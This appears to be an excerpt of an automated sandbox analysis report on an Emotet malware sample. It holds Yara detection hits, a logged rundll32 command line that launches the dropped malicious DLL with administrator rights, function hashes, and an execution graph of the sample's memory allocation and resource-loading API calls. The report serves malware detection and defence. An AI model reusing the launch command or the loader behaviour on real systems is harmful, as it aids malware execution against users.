                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.611962960.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.611361259.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.611503359.00000000003A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                          General

                                                                                                                                                          Target ID:17
                                                                                                                                                          Start time:00:15:53
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667560205.0000000002AB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667419702.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667165192.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667142438.0000000002261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667531977.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666923512.0000000000431000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667706749.0000000002C41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667352422.0000000002491000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666878998.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667611615.0000000002B11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.668008278.0000000002F91000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667590732.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.669688860.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667897137.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666799791.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666842278.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666953938.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667829863.0000000002D20000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667636789.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                          Disassembly

                                                                                                                                                          Reset < >

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 031E1CE2 Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411031086.00000000031E1000.00000010.00000800.00020000.00000000.sdmp, Offset: 031E1000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_31e0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: x0E
                                                                                                                                                            • API String ID: 0-2085839638
                                                                                                                                                            • Opcode ID: 99aee6422d3f08525272ca22233b5d816d9eb4e1c5dc41a1d7d3929cea8755ee
                                                                                                                                                            • Instruction ID: ea1a5810ff67aa2bacbec9fa6811f23186a4b5717c7f76b85bacbbf6a1863647
                                                                                                                                                            • Opcode Fuzzy Hash: 99aee6422d3f08525272ca22233b5d816d9eb4e1c5dc41a1d7d3929cea8755ee
                                                                                                                                                            • Instruction Fuzzy Hash: A5D1F220618E584FCB5DEB2C8464621BBE1FB5D345B1984AEE48ECB292DB35CCD28395
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 031E1CE2 Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411031086.00000000031E1000.00000010.00000800.00020000.00000000.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                            • Associated: 00000004.00000003.410995408.00000000031E0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_31e0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: x0E
                                                                                                                                                            • API String ID: 0-2085839638
                                                                                                                                                            • Opcode ID: 99aee6422d3f08525272ca22233b5d816d9eb4e1c5dc41a1d7d3929cea8755ee
                                                                                                                                                            • Instruction ID: ea1a5810ff67aa2bacbec9fa6811f23186a4b5717c7f76b85bacbbf6a1863647
                                                                                                                                                            • Opcode Fuzzy Hash: 99aee6422d3f08525272ca22233b5d816d9eb4e1c5dc41a1d7d3929cea8755ee
                                                                                                                                                            • Instruction Fuzzy Hash: A5D1F220618E584FCB5DEB2C8464621BBE1FB5D345B1984AEE48ECB292DB35CCD28395
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 031E3120 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.410995408.00000000031E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031E3000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_31e0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ee3897ea9c07d1d4adb7525daf5f0ffa21b7eb4689494ddfdd79d87bcccaa9bf
                                                                                                                                                            • Instruction ID: 66a6a1469f481cb4f5a91182a2f233d97174afe2281711c079623fa8db81b43d
                                                                                                                                                            • Opcode Fuzzy Hash: ee3897ea9c07d1d4adb7525daf5f0ffa21b7eb4689494ddfdd79d87bcccaa9bf
                                                                                                                                                            • Instruction Fuzzy Hash: A551D43471CE484FCB4DEB1C8859A21B7E1FB5D300B4988EEE49AC7292DB24CCD58796
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 031E3120 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.410995408.00000000031E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_31e0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ee3897ea9c07d1d4adb7525daf5f0ffa21b7eb4689494ddfdd79d87bcccaa9bf
                                                                                                                                                            • Instruction ID: 66a6a1469f481cb4f5a91182a2f233d97174afe2281711c079623fa8db81b43d
                                                                                                                                                            • Opcode Fuzzy Hash: ee3897ea9c07d1d4adb7525daf5f0ffa21b7eb4689494ddfdd79d87bcccaa9bf
                                                                                                                                                            • Instruction Fuzzy Hash: A551D43471CE484FCB4DEB1C8859A21B7E1FB5D300B4988EEE49AC7292DB24CCD58796
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0F49 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 02AE0F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 000007FF00260A21 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.677683835.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fcd7d3b6bc475ecad1ad7a383ecc6839492533c70b0766a7d340fc71ec984b00
                                                                                                                                                            • Instruction ID: 6e2ea8d94553463144734f189fb0fb47c363d83cff6f5945521bdc62943d26e5
                                                                                                                                                            • Opcode Fuzzy Hash: fcd7d3b6bc475ecad1ad7a383ecc6839492533c70b0766a7d340fc71ec984b00
                                                                                                                                                            • Instruction Fuzzy Hash: EA718961A0EBC64FEB1357786C697A17FB09F17214F1E40EBD488CB0E3E9585859C362
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 000007FF002608A5 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.677683835.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ae32295bd5dc35de236536e21a197bbdaf2dcc7053f71b6347d61523cb889cab
                                                                                                                                                            • Instruction ID: e1d2ae8802caa2e090f77081340641bf9048fae25aff5f410c40e55ac45cd77f
                                                                                                                                                            • Opcode Fuzzy Hash: ae32295bd5dc35de236536e21a197bbdaf2dcc7053f71b6347d61523cb889cab
                                                                                                                                                            • Instruction Fuzzy Hash: E941EEA194E7C24FE713477858A57A13FB09F57214F0E04EBE488CF0A3E558999AD322
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:16.1%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                                            Signature Coverage:21.9%
                                                                                                                                                            Total number of Nodes:297
                                                                                                                                                            Total number of Limit Nodes:23
                                                                                                                                                            execution_graph 31847 10035042 TlsGetValue 31848 10035076 GetModuleHandleA 31847->31848 31849 10035055 31847->31849 31851 10035085 GetProcAddress 31848->31851 31852 1003509f 31848->31852 31849->31848 31850 1003505f TlsGetValue 31849->31850 31855 1003506a 31850->31855 31853 1003506e 31851->31853 31853->31852 31854 10035095 RtlEncodePointer 31853->31854 31854->31852 31855->31848 31855->31853 31856 10020c26 31859 10020c32 __EH_prolog3 31856->31859 31858 10020c80 31883 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31858->31883 31859->31858 31867 1002083b EnterCriticalSection 31859->31867 31881 100201f1 RaiseException __CxxThrowException@8 31859->31881 31882 1002094b TlsAlloc InitializeCriticalSection 31859->31882 31861 10020c8d 31864 10020c93 31861->31864 31865 10020ca6 ~_Task_impl 31861->31865 31884 100209ed 88 API calls 4 library calls 31864->31884 31868 1002085a 31867->31868 31870 10020893 31868->31870 31871 100208a8 GlobalHandle GlobalUnlock 31868->31871 31880 10020916 _memset 31868->31880 31869 1002092a LeaveCriticalSection 31869->31859 31885 10014460 31870->31885 31872 10014460 ctype 80 API calls 31871->31872 31874 100208c5 GlobalReAlloc 31872->31874 31876 100208cf 31874->31876 31877 100208f7 GlobalLock 31876->31877 31878 100208da GlobalHandle GlobalLock 31876->31878 31879 100208e8 LeaveCriticalSection 31876->31879 31877->31880 31878->31879 31879->31877 31880->31869 31882->31859 31883->31861 31884->31865 31886 10014477 ctype 31885->31886 31887 1001448c GlobalAlloc 31886->31887 31889 10013ba0 80 API calls ctype 31886->31889 31887->31876 31889->31887 31890 10030d06 31891 10030d12 31890->31891 31892 10030d0d 31890->31892 31896 10030c10 31891->31896 31908 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31892->31908 31895 10030d23 31897 10030c1c type_info::_Type_info_dtor 31896->31897 31901 10030c69 31897->31901 31907 10030cb9 type_info::_Type_info_dtor 31897->31907 31909 10030a37 31897->31909 31901->31907 31963 100125c0 31901->31963 31902 10030c99 31903 10030a37 __CRT_INIT@12 165 API calls 31902->31903 31902->31907 31903->31907 31904 100125c0 ___DllMainCRTStartup 146 API calls 31905 10030c90 31904->31905 31906 10030a37 __CRT_INIT@12 165 API calls 31905->31906 31906->31902 31907->31895 31908->31891 31910 10030b61 31909->31910 31911 10030a4a GetProcessHeap HeapAlloc 31909->31911 31913 10030b67 31910->31913 31914 10030b9c 31910->31914 31912 10030a6e GetVersionExA 31911->31912 31928 10030a67 31911->31928 31915 10030a89 GetProcessHeap HeapFree 31912->31915 31916 10030a7e GetProcessHeap HeapFree 31912->31916 31921 10030b86 31913->31921 31913->31928 32011 100310be 67 API calls _doexit 31913->32011 31917 10030ba1 31914->31917 31918 10030bfa 31914->31918 31919 10030ab5 31915->31919 31916->31928 31995 10035135 6 API calls __decode_pointer 31917->31995 31918->31928 32030 10035425 79 API calls 2 library calls 31918->32030 31985 10036624 HeapCreate 31919->31985 31921->31928 32012 100389ee 68 API calls __output_s_l 31921->32012 31923 10030ba6 31996 10035840 31923->31996 31928->31901 31929 10030aeb 31929->31928 31932 10030af4 31929->31932 31930 10030b90 32013 10035178 70 API calls 2 library calls 31930->32013 32002 1003548e 78 API calls 6 library calls 31932->32002 31935 10030bbe 32015 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31935->32015 31937 10030af9 __RTC_Initialize 31942 10030b0c GetCommandLineA 31937->31942 31956 10030afd 31937->31956 31938 10030b95 32014 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31938->32014 31939 10030bd0 31943 10030bd7 31939->31943 31944 10030bee 31939->31944 32004 10038d66 77 API calls 3 library calls 31942->32004 32016 100351b5 67 API calls 4 library calls 31943->32016 32017 1002fa69 31944->32017 31948 10030b1c 32005 100387ae 72 API calls 3 library calls 31948->32005 31949 10030bde GetCurrentThreadId 31949->31928 31951 10030b26 31952 10030b2a 31951->31952 32007 10038cad 111 API calls 3 library calls 31951->32007 32006 10035178 70 API calls 2 library calls 31952->32006 31955 10030b36 31957 10030b4a 31955->31957 32008 10038a3a 110 API calls 6 library calls 31955->32008 32003 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31956->32003 31962 10030b02 31957->31962 32010 100389ee 68 API calls __output_s_l 31957->32010 31960 10030b3f 31960->31957 32009 10030f4d 75 API calls 4 library calls 31960->32009 31962->31928 32056 10006a90 31963->32056 31966 1001265a 32090 1002fe65 105 API calls 8 library calls 31966->32090 31967 1001261c FindResourceW LoadResource SizeofResource 31970 10006a90 ___DllMainCRTStartup 67 API calls 31967->31970 31973 10012744 ___DllMainCRTStartup 31970->31973 31972 1001284d 31972->31902 31972->31904 31974 100127b7 VirtualAlloc 31973->31974 31975 1001279b VirtualAllocExNuma 31973->31975 31976 100127da 31974->31976 31975->31976 32061 1002fb00 31976->32061 31980 100127fa 32084 10002970 31980->32084 31982 10012810 ___DllMainCRTStartup 32087 100026a0 31982->32087 31984 10012664 32091 1002f81e 5 API calls __invoke_watson 31984->32091 31986 10036647 31985->31986 31987 10036644 31985->31987 32031 100365c9 67 API calls 2 library calls 31986->32031 31987->31929 31989 1003664c 31990 10036656 31989->31990 31991 1003667a 31989->31991 32032 10035aca HeapAlloc 31990->32032 31991->31929 31993 10036660 31993->31991 31994 10036665 HeapDestroy 31993->31994 31994->31987 31995->31923 31997 10035844 31996->31997 31999 10030bb2 31997->31999 32000 10035864 Sleep 31997->32000 32033 10030678 31997->32033 31999->31928 31999->31935 32001 10035879 32000->32001 32001->31997 32001->31999 32002->31937 32003->31962 32004->31948 32005->31951 32006->31956 32007->31955 32008->31960 32009->31957 32010->31952 32011->31921 32012->31930 32013->31938 32014->31928 32015->31939 32016->31949 32019 1002fa75 